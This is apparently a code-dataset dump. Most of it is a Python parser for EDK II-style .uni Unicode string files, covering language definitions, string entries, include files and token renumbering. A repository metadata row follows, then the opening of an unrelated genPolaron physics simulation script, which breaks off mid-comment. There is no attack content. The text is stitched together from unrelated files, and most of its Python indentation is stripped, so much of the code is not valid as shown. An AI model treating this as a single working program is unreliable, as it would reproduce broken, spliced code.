repr(self.UseOtherLangDef)
def UpdateValue(self, Value = None):
if Value is not None:
if self.StringValue:
self.StringValue = self.StringValue + '\r\n' + Value
else:
self.StringValue = Value
self.StringValueByteList = UniToHexList(self.StringValue)
self.Length = len(self.StringValueByteList)
## UniFileClassObject
#
# A structure for .uni file definition
#
class UniFileClassObject(object):
def __init__(self, FileList = None, IsCompatibleMode = False, IncludePathList = None):
self.FileList = FileList
self.File = None
self.IncFileList = FileList
self.UniFileHeader = ''
self.Token = 2
self.LanguageDef = [] #[ [u'LanguageIdentifier', u'PrintableName'], ... ]
self.OrderedStringList = {} #{ u'LanguageIdentifier' : [StringDefClassObject] }
self.OrderedStringDict = {} #{ u'LanguageIdentifier' : {StringName:(IndexInList)} }
self.OrderedStringListByToken = {} #{ u'LanguageIdentifier' : {Token: StringDefClassObject} }
self.IsCompatibleMode = IsCompatibleMode
if not IncludePathList:
self.IncludePathList = []
else:
self.IncludePathList = IncludePathList
if len(self.FileList) > 0:
self.LoadUniFiles(FileList)
#
# Get Language definition
#
def GetLangDef(self, File, Line):
Lang = distutils.util.split_quoted((Line.split(u"//")[0]))
if len(Lang) != 3:
            try:
                FileIn = codecs.open(File.Path, mode='rb', encoding='utf_8').readlines()
            except UnicodeError:
                try:
                    FileIn = codecs.open(File.Path, mode='rb', encoding='utf_16').readlines()
                except UnicodeError:
                    FileIn = codecs.open(File.Path, mode='rb', encoding='utf_16_le').readlines()
            except Exception as Xstr:
                EdkLogger.Error("Unicode File Parser",
                                ToolError.FILE_OPEN_FAILURE,
                                "File read failure: %s" % str(Xstr),
                                ExtraData=File)
LineNo = GetLineNo(FileIn, Line, False)
EdkLogger.Error("Unicode File Parser",
ToolError.PARSER_ERROR,
"Wrong language definition",
ExtraData="""%s\n\t*Correct format is like '#langdef en-US "English"'""" % Line,
File = File, Line = LineNo)
else:
LangName = GetLanguageCode(Lang[1], self.IsCompatibleMode, self.File)
LangPrintName = Lang[2]
IsLangInDef = False
for Item in self.LanguageDef:
if Item[0] == LangName:
IsLangInDef = True
break
if not IsLangInDef:
self.LanguageDef.append([LangName, LangPrintName])
#
# Add language string
#
self.AddStringToList(u'$LANGUAGE_NAME', LangName, LangName, 0, True, Index=0)
self.AddStringToList(u'$PRINTABLE_LANGUAGE_NAME', LangName, LangPrintName, 1, True, Index=1)
if not IsLangInDef:
#
# The found STRING tokens will be added into new language string list
# so that the unique STRING identifier is reserved for all languages in the package list.
#
FirstLangName = self.LanguageDef[0][0]
if LangName != FirstLangName:
for Index in range (2, len (self.OrderedStringList[FirstLangName])):
Item = self.OrderedStringList[FirstLangName][Index]
if Item.UseOtherLangDef != '':
OtherLang = Item.UseOtherLangDef
else:
OtherLang = FirstLangName
self.OrderedStringList[LangName].append (StringDefClassObject(Item.StringName,
'',
Item.Referenced,
Item.Token,
OtherLang))
self.OrderedStringDict[LangName][Item.StringName] = len(self.OrderedStringList[LangName]) - 1
return True
#
# Get String name and value
#
def GetStringObject(self, Item):
Language = ''
Value = ''
Name = Item.split()[1]
        # Check that the string token name is upper case
if Name != '':
MatchString = re.match('[A-Z0-9_]+', Name, re.UNICODE)
if MatchString is None or MatchString.end(0) != len(Name):
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
'The string token name %s in UNI file %s must be upper case character.' %(Name, self.File))
LanguageList = Item.split(u'#language ')
for IndexI in range(len(LanguageList)):
if IndexI == 0:
continue
else:
Language = LanguageList[IndexI].split()[0]
#.replace(u'\r\n', u'')
Value = \
LanguageList[IndexI][LanguageList[IndexI].find(u'\"') + len(u'\"') : LanguageList[IndexI].rfind(u'\"')]
Language = GetLanguageCode(Language, self.IsCompatibleMode, self.File)
self.AddStringToList(Name, Language, Value)
#
# Get include file list and load them
#
def GetIncludeFile(self, Item, Dir = None):
if Dir:
pass
FileName = Item[Item.find(u'!include ') + len(u'!include ') :Item.find(u' ', len(u'!include '))][1:-1]
self.LoadUniFile(FileName)
#
# Pre-process before parse .uni file
#
def PreProcess(self, File, IsIncludeFile=False):
if not os.path.exists(File.Path) or not os.path.isfile(File.Path):
EdkLogger.Error("Unicode File Parser",
ToolError.FILE_NOT_FOUND,
ExtraData=File.Path)
#
# Check file header of the Uni file
#
# if not CheckUTF16FileHeader(File.Path):
# EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
# ExtraData='The file %s is either invalid UTF-16LE or it is missing the BOM.' % File.Path)
        try:
            FileIn = codecs.open(File.Path, mode='rb', encoding='utf_8').readlines()
        except UnicodeError:
            try:
                FileIn = codecs.open(File.Path, mode='rb', encoding='utf_16').readlines()
            except UnicodeError:
                FileIn = codecs.open(File.Path, mode='rb', encoding='utf_16_le').readlines()
        except Exception:
            EdkLogger.Error("Unicode File Parser", ToolError.FILE_OPEN_FAILURE, ExtraData=File.Path)
#
# get the file header
#
Lines = []
HeaderStart = False
HeaderEnd = False
if not self.UniFileHeader:
FirstGenHeader = True
else:
FirstGenHeader = False
for Line in FileIn:
Line = Line.strip()
if Line == u'':
continue
if Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and (Line.find(DT.TAB_HEADER_COMMENT) > -1) \
and not HeaderEnd and not HeaderStart:
HeaderStart = True
if not Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and HeaderStart and not HeaderEnd:
HeaderEnd = True
if Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and HeaderStart and not HeaderEnd and FirstGenHeader:
self.UniFileHeader += Line + '\r\n'
continue
#
# Use unique identifier
#
FindFlag = -1
LineCount = 0
MultiLineFeedExits = False
#
# 0: initial value
# 1: single String entry exist
# 2: line feed exist under the some single String entry
#
StringEntryExistsFlag = 0
for Line in FileIn:
Line = FileIn[LineCount]
LineCount += 1
Line = Line.strip()
#
# Ignore comment line and empty line
#
if Line == u'' or Line.startswith(u'//'):
#
# Change the single line String entry flag status
#
if StringEntryExistsFlag == 1:
StringEntryExistsFlag = 2
#
# If the '#string' line and the '#language' line are not in the same line,
# there should be only one line feed character between them
#
if MultiLineFeedExits:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
continue
MultiLineFeedExits = False
#
# Process comment embedded in string define lines
#
FindFlag = Line.find(u'//')
if FindFlag != -1 and Line.find(u'//') < Line.find(u'"'):
Line = Line.replace(Line[FindFlag:], u' ')
if FileIn[LineCount].strip().startswith('#language'):
Line = Line + FileIn[LineCount]
FileIn[LineCount-1] = Line
FileIn[LineCount] = '\r\n'
LineCount -= 1
for Index in range (LineCount + 1, len (FileIn) - 1):
if (Index == len(FileIn) -1):
FileIn[Index] = '\r\n'
else:
FileIn[Index] = FileIn[Index + 1]
continue
CommIndex = GetCharIndexOutStr(u'/', Line)
if CommIndex > -1:
if (len(Line) - 1) > CommIndex:
if Line[CommIndex+1] == u'/':
Line = Line[:CommIndex].strip()
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
Line = Line.replace(UNICODE_WIDE_CHAR, WIDE_CHAR)
Line = Line.replace(UNICODE_NARROW_CHAR, NARROW_CHAR)
Line = Line.replace(UNICODE_NON_BREAKING_CHAR, NON_BREAKING_CHAR)
Line = Line.replace(u'\\\\', u'\u0006')
Line = Line.replace(u'\\r\\n', CR + LF)
Line = Line.replace(u'\\n', CR + LF)
Line = Line.replace(u'\\r', CR)
Line = Line.replace(u'\\t', u'\t')
Line = Line.replace(u'''\"''', u'''"''')
Line = Line.replace(u'\t', u' ')
Line = Line.replace(u'\u0006', u'\\')
#
# Check if single line has correct '"'
#
if Line.startswith(u'#string') and Line.find(u'#language') > -1 and Line.find('"') > Line.find(u'#language'):
if not Line.endswith('"'):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s misses '"' at the end of it in file %s'''
% (LineCount, File.Path))
#
            # A line feed must not appear between the Name entry and the Language entry
#
if Line.startswith(u'#string') and Line.find(u'#language') == -1:
MultiLineFeedExits = True
if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.find(u'"') < 0:
MultiLineFeedExits = True
#
            # A line feed must not appear between the Language entry and the String entry
#
if Line.startswith(u'#language') and len(Line.split()) == 2:
MultiLineFeedExits = True
#
            # Check the situation where there is only one '"' for the language entry
#
if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.count(u'"') == 1:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s misses '"' at the end of it in file %s'''
% (LineCount, File.Path))
#
            # Check the situation where there are more than 2 '"' for the language entry
#
if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.replace(u'\\"', '').count(u'"') > 2:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s has more than 2 '"' for language entry in file %s'''
% (LineCount, File.Path))
#
            # A line feed must not appear between two String entries
#
if Line.startswith(u'"'):
if StringEntryExistsFlag == 2:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
Message=ST.ERR_UNIPARSE_LINEFEED_UP_EXIST % Line, ExtraData=File.Path)
StringEntryExistsFlag = 1
if not Line.endswith('"'):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s misses '"' at the end of it in file %s'''
% (LineCount, File.Path))
#
                # Check the situation where there are more than 2 '"' for the language entry
#
if Line.strip() and Line.replace(u'\\"', '').count(u'"') > 2:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s has more than 2 '"' for language entry in file %s'''
% (LineCount, File.Path))
elif Line.startswith(u'#language'):
if StringEntryExistsFlag == 2:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
Message=ST.ERR_UNI_MISS_STRING_ENTRY % Line, ExtraData=File.Path)
StringEntryExistsFlag = 0
else:
StringEntryExistsFlag = 0
Lines.append(Line)
#
# Convert string def format as below
#
# #string MY_STRING_1
# #language eng
# "My first English string line 1"
# "My first English string line 2"
# #string MY_STRING_1
# #language spa
# "Mi segunda secuencia 1"
# "Mi segunda secuencia 2"
#
if not IsIncludeFile and not Lines:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_NO_SECTION_EXIST, \
ExtraData=File.Path)
NewLines = []
StrName = u''
ExistStrNameList = []
for Line in Lines:
if StrName and not StrName.split()[1].startswith(DT.TAB_STR_TOKENCNAME + DT.TAB_UNDERLINE_SPLIT):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_STRNAME_FORMAT_ERROR % StrName.split()[1], \
ExtraData=File.Path)
if StrName and len(StrName.split()[1].split(DT.TAB_UNDERLINE_SPLIT)) == 4:
StringTokenList = StrName.split()[1].split(DT.TAB_UNDERLINE_SPLIT)
if (StringTokenList[3].upper() in [DT.TAB_STR_TOKENPROMPT, DT.TAB_STR_TOKENHELP] and \
StringTokenList[3] not in [DT.TAB_STR_TOKENPROMPT, DT.TAB_STR_TOKENHELP]) or \
(StringTokenList[2].upper() == DT.TAB_STR_TOKENERR and StringTokenList[2] != DT.TAB_STR_TOKENERR):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_STRTOKEN_FORMAT_ERROR % StrName.split()[1], \
ExtraData=File.Path)
if Line.count(u'#language') > 1:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_SEP_LANGENTRY_LINE % Line, \
ExtraData=File.Path)
if Line.startswith(u'//'):
continue
elif Line.startswith(u'#langdef'):
if len(Line.split()) == 2:
NewLines.append(Line)
continue
elif len(Line.split()) > 2 and Line.find(u'"') > 0:
NewLines.append(Line[:Line.find(u'"')].strip())
NewLines.append(Line[Line.find(u'"'):])
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
elif Line.startswith(u'#string'):
if len(Line.split()) == 2:
StrName = Line
if StrName:
if StrName.split()[1] not in ExistStrNameList:
ExistStrNameList.append(StrName.split()[1].strip())
elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \
DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \
DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \
DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \
ExtraData=File.Path)
continue
elif len(Line.split()) == 4 and Line.find(u'#language') > 0:
if Line[Line.find(u'#language')-1] != ' ' or \
Line[Line.find(u'#language')+len(u'#language')] != u' ':
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
if Line.find(u'"') > 0:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
StrName = Line.split()[0] + u' ' + Line.split()[1]
if StrName:
if StrName.split()[1] not in ExistStrNameList:
ExistStrNameList.append(StrName.split()[1].strip())
elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \
DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \
DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \
DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \
ExtraData=File.Path)
if IsIncludeFile:
if StrName not in NewLines:
NewLines.append((Line[:Line.find(u'#language')]).strip())
else:
NewLines.append((Line[:Line.find(u'#language')]).strip())
NewLines.append((Line[Line.find(u'#language'):]).strip())
elif len(Line.split()) > 4 and Line.find(u'#language') > 0 and Line.find(u'"') > 0:
if Line[Line.find(u'#language')-1] != u' ' or \
Line[Line.find(u'#language')+len(u'#language')] != u' ':
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
if Line[Line.find(u'"')-1] != u' ':
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
StrName = Line.split()[0] + u' ' + Line.split()[1]
if StrName:
if StrName.split()[1] not in ExistStrNameList:
ExistStrNameList.append(StrName.split()[1].strip())
elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \
DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \
DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \
DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \
ExtraData=File.Path)
if IsIncludeFile:
if StrName not in NewLines:
NewLines.append((Line[:Line.find(u'#language')]).strip())
else:
NewLines.append((Line[:Line.find(u'#language')]).strip())
NewLines.append((Line[Line.find(u'#language'):Line.find(u'"')]).strip())
NewLines.append((Line[Line.find(u'"'):]).strip())
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
elif Line.startswith(u'#language'):
if len(Line.split()) == 2:
if IsIncludeFile:
if StrName not in NewLines:
NewLines.append(StrName)
else:
NewLines.append(StrName)
NewLines.append(Line)
elif len(Line.split()) > 2 and Line.find(u'"') > 0:
if IsIncludeFile:
if StrName not in NewLines:
NewLines.append(StrName)
else:
NewLines.append(StrName)
NewLines.append((Line[:Line.find(u'"')]).strip())
NewLines.append((Line[Line.find(u'"'):]).strip())
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
elif Line.startswith(u'"'):
if u'#string' in Line or u'#language' in Line:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
NewLines.append(Line)
else:
print(Line)
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
if StrName and not StrName.split()[1].startswith(u'STR_'):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_STRNAME_FORMAT_ERROR % StrName.split()[1], \
ExtraData=File.Path)
if StrName and not NewLines:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNI_MISS_LANGENTRY % StrName, \
ExtraData=File.Path)
#
# Check Abstract, Description, BinaryAbstract and BinaryDescription order,
# should be Abstract, Description, BinaryAbstract, BinaryDescription
AbstractPosition = -1
DescriptionPosition = -1
BinaryAbstractPosition = -1
BinaryDescriptionPosition = -1
for StrName in ExistStrNameList:
if DT.TAB_HEADER_ABSTRACT.upper() in StrName:
if 'BINARY' in StrName:
BinaryAbstractPosition = ExistStrNameList.index(StrName)
else:
AbstractPosition = ExistStrNameList.index(StrName)
if DT.TAB_HEADER_DESCRIPTION.upper() in StrName:
if 'BINARY' in StrName:
BinaryDescriptionPosition = ExistStrNameList.index(StrName)
else:
DescriptionPosition = ExistStrNameList.index(StrName)
OrderList = sorted([AbstractPosition, DescriptionPosition])
BinaryOrderList = sorted([BinaryAbstractPosition, BinaryDescriptionPosition])
Min = OrderList[0]
Max = OrderList[1]
BinaryMin = BinaryOrderList[0]
BinaryMax = BinaryOrderList[1]
if BinaryDescriptionPosition > -1:
if not(BinaryDescriptionPosition == BinaryMax and BinaryAbstractPosition == BinaryMin and \
BinaryMax > Max):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \
ExtraData=File.Path)
elif BinaryAbstractPosition > -1:
if not(BinaryAbstractPosition > Max):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \
ExtraData=File.Path)
if DescriptionPosition > -1:
if not(DescriptionPosition == Max and AbstractPosition == Min and \
DescriptionPosition > AbstractPosition):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \
ExtraData=File.Path)
if not self.UniFileHeader:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
Message = ST.ERR_NO_SOURCE_HEADER,
ExtraData=File.Path)
return NewLines
#
# Load a .uni file
#
def LoadUniFile(self, File = None):
if File is None:
EdkLogger.Error("Unicode File Parser",
ToolError.PARSER_ERROR,
                            Message='No unicode file is given')
self.File = File
#
# Process special char in file
#
Lines = self.PreProcess(File)
#
# Get Unicode Information
#
for IndexI in range(len(Lines)):
Line = Lines[IndexI]
if (IndexI + 1) < len(Lines):
SecondLine = Lines[IndexI + 1]
if (IndexI + 2) < len(Lines):
ThirdLine = Lines[IndexI + 2]
#
# Get Language def information
#
if Line.find(u'#langdef ') >= 0:
self.GetLangDef(File, Line + u' ' + SecondLine)
continue
Name = ''
Language = ''
Value = ''
CombineToken = False
#
# Get string def information format as below
#
# #string MY_STRING_1
# #language eng
# "My first English string line 1"
# "My first English string line 2"
# #string MY_STRING_1
# #language spa
# "Mi segunda secuencia 1"
# "Mi segunda secuencia 2"
#
if Line.find(u'#string ') >= 0 and Line.find(u'#language ') < 0 and \
SecondLine.find(u'#string ') < 0 and SecondLine.find(u'#language ') >= 0 and \
ThirdLine.find(u'#string ') < 0 and ThirdLine.find(u'#language ') < 0:
if Line.find('"') > 0 or SecondLine.find('"') > 0:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
Message=ST.ERR_UNIPARSE_DBLQUOTE_UNMATCHED,
ExtraData=File.Path)
Name = Line[Line.find(u'#string ') + len(u'#string ') : ].strip(' ')
Language = SecondLine[SecondLine.find(u'#language ') + len(u'#language ') : ].strip(' ')
for IndexJ in range(IndexI + 2, len(Lines)):
if Lines[IndexJ].find(u'#string ') < 0 and Lines[IndexJ].find(u'#language ') < 0 and \
Lines[IndexJ].strip().startswith(u'"') and Lines[IndexJ].strip().endswith(u'"'):
if Lines[IndexJ][-2] == ' ':
CombineToken = True
if CombineToken:
if Lines[IndexJ].strip()[1:-1].strip():
Value = Value + Lines[IndexJ].strip()[1:-1].rstrip() + ' '
else:
Value = Value + Lines[IndexJ].strip()[1:-1]
CombineToken = False
else:
Value = Value + Lines[IndexJ].strip()[1:-1] + '\r\n'
else:
IndexI = IndexJ
break
if Value.endswith('\r\n'):
Value = Value[: Value.rfind('\r\n')]
Language = GetLanguageCode(Language, self.IsCompatibleMode, self.File)
self.AddStringToList(Name, Language, Value)
continue
#
# Load multiple .uni files
#
def LoadUniFiles(self, FileList):
if len(FileList) > 0:
for File in FileList:
FilePath = File.Path.strip()
if FilePath.endswith('.uni') or FilePath.endswith('.UNI') or FilePath.endswith('.Uni'):
self.LoadUniFile(File)
#
# Add a string to list
#
def AddStringToList(self, Name, Language, Value, Token = 0, Referenced = False, UseOtherLangDef = '', Index = -1):
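        #
        # Update the existing entry if the string is already defined for this
        # language; otherwise append it (and, for a new token, a placeholder
        # entry for every other language) so all languages share the same
        # token numbering.
        #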
for LangNameItem in self.LanguageDef:
if Language == LangNameItem[0]:
break
if Language not in self.OrderedStringList:
self.OrderedStringList[Language] = []
self.OrderedStringDict[Language] = {}
IsAdded = True
if Name in self.OrderedStringDict[Language]:
IsAdded = False
if Value is not None:
ItemIndexInList = self.OrderedStringDict[Language][Name]
Item = self.OrderedStringList[Language][ItemIndexInList]
Item.UpdateValue(Value)
Item.UseOtherLangDef = ''
if IsAdded:
Token = len(self.OrderedStringList[Language])
if Index == -1:
self.OrderedStringList[Language].append(StringDefClassObject(Name,
Value,
Referenced,
Token,
UseOtherLangDef))
self.OrderedStringDict[Language][Name] = Token
for LangName in self.LanguageDef:
#
# New STRING token will be added into all language string lists.
# so that the unique STRING identifier is reserved for all languages in the package list.
#
if LangName[0] != Language:
if UseOtherLangDef != '':
OtherLangDef = UseOtherLangDef
else:
OtherLangDef = Language
self.OrderedStringList[LangName[0]].append(StringDefClassObject(Name,
'',
Referenced,
Token,
OtherLangDef))
self.OrderedStringDict[LangName[0]][Name] = len(self.OrderedStringList[LangName[0]]) - 1
else:
self.OrderedStringList[Language].insert(Index, StringDefClassObject(Name,
Value,
Referenced,
Token,
UseOtherLangDef))
self.OrderedStringDict[Language][Name] = Index
#
# Set the string as referenced
#
def SetStringReferenced(self, Name):
#
        # String tokens are added in the same order in all language string lists.
        # So, only update the status of the string token in the first language string list.
#
Lang = self.LanguageDef[0][0]
if Name in self.OrderedStringDict[Lang]:
ItemIndexInList = self.OrderedStringDict[Lang][Name]
Item = self.OrderedStringList[Lang][ItemIndexInList]
Item.Referenced = True
#
# Search the string in language definition by Name
#
def FindStringValue(self, Name, Lang):
if Name in self.OrderedStringDict[Lang]:
ItemIndexInList = self.OrderedStringDict[Lang][Name]
return self.OrderedStringList[Lang][ItemIndexInList]
return None
#
# Search the string in language definition by Token
#
def FindByToken(self, Token, Lang):
for Item in self.OrderedStringList[Lang]:
if Item.Token == Token:
return Item
return None
#
# Re-order strings and re-generate tokens
#
def ReToken(self):
if len(self.LanguageDef) == 0:
return None
#
        # Retoken all language strings according to the status of the string tokens in the first language string list.
#
FirstLangName = self.LanguageDef[0][0]
        # Convert the OrderedStringList to OrderedStringListByToken in order to facilitate future searches by token
for LangNameItem in self.LanguageDef:
self.OrderedStringListByToken[LangNameItem[0]] = {}
#
        # Use small token values for all referenced string tokens.
#
RefToken = 0
for Index in range (0, len (self.OrderedStringList[FirstLangName])):
FirstLangItem = self.OrderedStringList[FirstLangName][Index]
if FirstLangItem.Referenced == True:
for LangNameItem in self.LanguageDef:
LangName = LangNameItem[0]
OtherLangItem = self.OrderedStringList[LangName][Index]
OtherLangItem.Referenced = True
OtherLangItem.Token = RefToken
self.OrderedStringListByToken[LangName][OtherLangItem.Token] = OtherLangItem
RefToken = RefToken + 1
#
        # Use big token values for all unreferenced string tokens.
#
UnRefToken = 0
for Index in range (0, len (self.OrderedStringList[FirstLangName])):
FirstLangItem = self.OrderedStringList[FirstLangName][Index]
if FirstLangItem.Referenced == False:
for LangNameItem in self.LanguageDef:
LangName = LangNameItem[0]
OtherLangItem = self.OrderedStringList[LangName][Index]
OtherLangItem.Token = RefToken + UnRefToken
self.OrderedStringListByToken[LangName][OtherLangItem.Token] = OtherLangItem
UnRefToken = UnRefToken + 1
#
# Show the instance itself
#
def ShowMe(self):
print(self.LanguageDef)
#print self.OrderedStringList
for Item in self.OrderedStringList:
print(Item)
for Member in self.OrderedStringList[Item]:
print(str(Member))
#
# Read content from '!include' UNI file
#
def ReadIncludeUNIfile(self, FilaPath):
if self.File:
pass
if not os.path.exists(FilaPath) or not os.path.isfile(FilaPath):
EdkLogger.Error("Unicode File Parser",
ToolError.FILE_NOT_FOUND,
ExtraData=FilaPath)
try:
FileIn = codecs.open(FilaPath, mode='rb', encoding='utf_8').readlines()
except UnicodeError as Xstr:
FileIn = codecs.open(FilaPath, mode='rb', encoding='utf_16').readlines()
except UnicodeError:
FileIn = codecs.open(FilaPath, mode='rb', encoding='utf_16_le').readlines()
except:
EdkLogger.Error("Unicode File Parser", ToolError.FILE_OPEN_FAILURE, ExtraData=FilaPath)
return FileIn
| apache-2.0 | 5,085,709,943,603,805,000 | 44.57963 | 121 | 0.500139 | false | 4.175465 | false | false | false |
kseetharam/genPolaron | datagen_qdynamics_cart_massRat.py | 1 | 7033 | import numpy as np
import pandas as pd
import xarray as xr
import Grid
import pf_dynamic_cart
import os
import sys
from timeit import default_timer as timer
# import pf_static_cart
if __name__ == "__main__":
start = timer()
# ---- INITIALIZE GRIDS ----
(Lx, Ly, Lz) = (21, 21, 21)
(dx, dy, dz) = (0.375, 0.375, 0.375)
xgrid = Grid.Grid('CARTESIAN_3D')
xgrid.initArray('x', -Lx, Lx, dx); xgrid.initArray('y', -Ly, Ly, dy); xgrid.initArray('z', -Lz, Lz, dz)
(Nx, Ny, Nz) = (len(xgrid.getArray('x')), len(xgrid.getArray('y')), len(xgrid.getArray('z')))
# print((Nx * Ny * Nz)**(1 / 3) * (0.1 / 21))
# print(3 * np.log10(2560 / 10))
    kxfft = np.fft.fftfreq(Nx) * 2 * np.pi / dx; kyfft = np.fft.fftfreq(Ny) * 2 * np.pi / dy; kzfft = np.fft.fftfreq(Nz) * 2 * np.pi / dz
kgrid = Grid.Grid('CARTESIAN_3D')
kgrid.initArray_premade('kx', np.fft.fftshift(kxfft)); kgrid.initArray_premade('ky', np.fft.fftshift(kyfft)); kgrid.initArray_premade('kz', np.fft.fftshift(kzfft))
kx = kgrid.getArray('kx')
tMax = 1000
dt = 10
# tMax = 100
# dt = 0.2
tgrid = np.arange(0, tMax + dt, dt)
gParams = [xgrid, kgrid, tgrid]
# NGridPoints = (2 * Lx / dx) * (2 * Ly / dy) * (2 * Lz / dz)
NGridPoints = xgrid.size()
kx = kgrid.getArray('kx'); ky = kgrid.getArray('ky'); kz = kgrid.getArray('kz')
k_max = np.sqrt(np.max(kx)**2 + np.max(ky)**2 + np.max(kz)**2)
print('datagen_qdynamics_cart_massRat')
print('Total time steps: {0}'.format(tgrid.size))
print('UV cutoff: {0}'.format(k_max))
print('NGridPoints: {0}'.format(NGridPoints))
# Basic parameters
# Toggle parameters
toggleDict = {'Location': 'cluster', 'Dynamics': 'imaginary', 'Coupling': 'twophonon', 'Grid': 'cartesian'}
# ---- SET PARAMS ----
mB = 1
n0 = 1
gBB = (4 * np.pi / mB) * 0.05
Params_List = []
# mI_Vals = np.array([1, 2, 5, 10])
# aIBi_Vals = np.array([-10.0, -5.0, -2.0])
# # P_Vals = np.array([0.1, 0.4, 0.8, 0.9, 1.0, 1.1, 1.2, 1.4, 1.6, 2.0, 2.4, 2.7, 3.0, 4.0, 5.0])
# P_Vals = np.array([3.2, 3.4, 3.6, 3.8, 3.9, 4.1, 4.2, 4.4, 4.6, 4.8, 5.2, 5.4, 5.6, 5.8, 6.0])
# for mI in mI_Vals:
# for aIBi in aIBi_Vals:
# for P in P_Vals:
# sParams = [mI, mB, n0, gBB]
# cParams = [P, aIBi]
# if toggleDict['Location'] == 'home':
# datapath = '/home/kis/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
# elif toggleDict['Location'] == 'work':
# datapath = '/media/kis/Storage/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
# elif toggleDict['Location'] == 'cluster':
# datapath = '/n/regal/demler_lab/kis/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
# if toggleDict['Dynamics'] == 'real':
# innerdatapath = datapath + '/redyn'
# elif toggleDict['Dynamics'] == 'imaginary':
# innerdatapath = datapath + '/imdyn'
# if toggleDict['Grid'] == 'cartesian':
# innerdatapath = innerdatapath + '_cart'
# elif toggleDict['Grid'] == 'spherical':
# innerdatapath = innerdatapath + '_spherical'
# if toggleDict['Coupling'] == 'frohlich':
# innerdatapath = innerdatapath + '_froh'
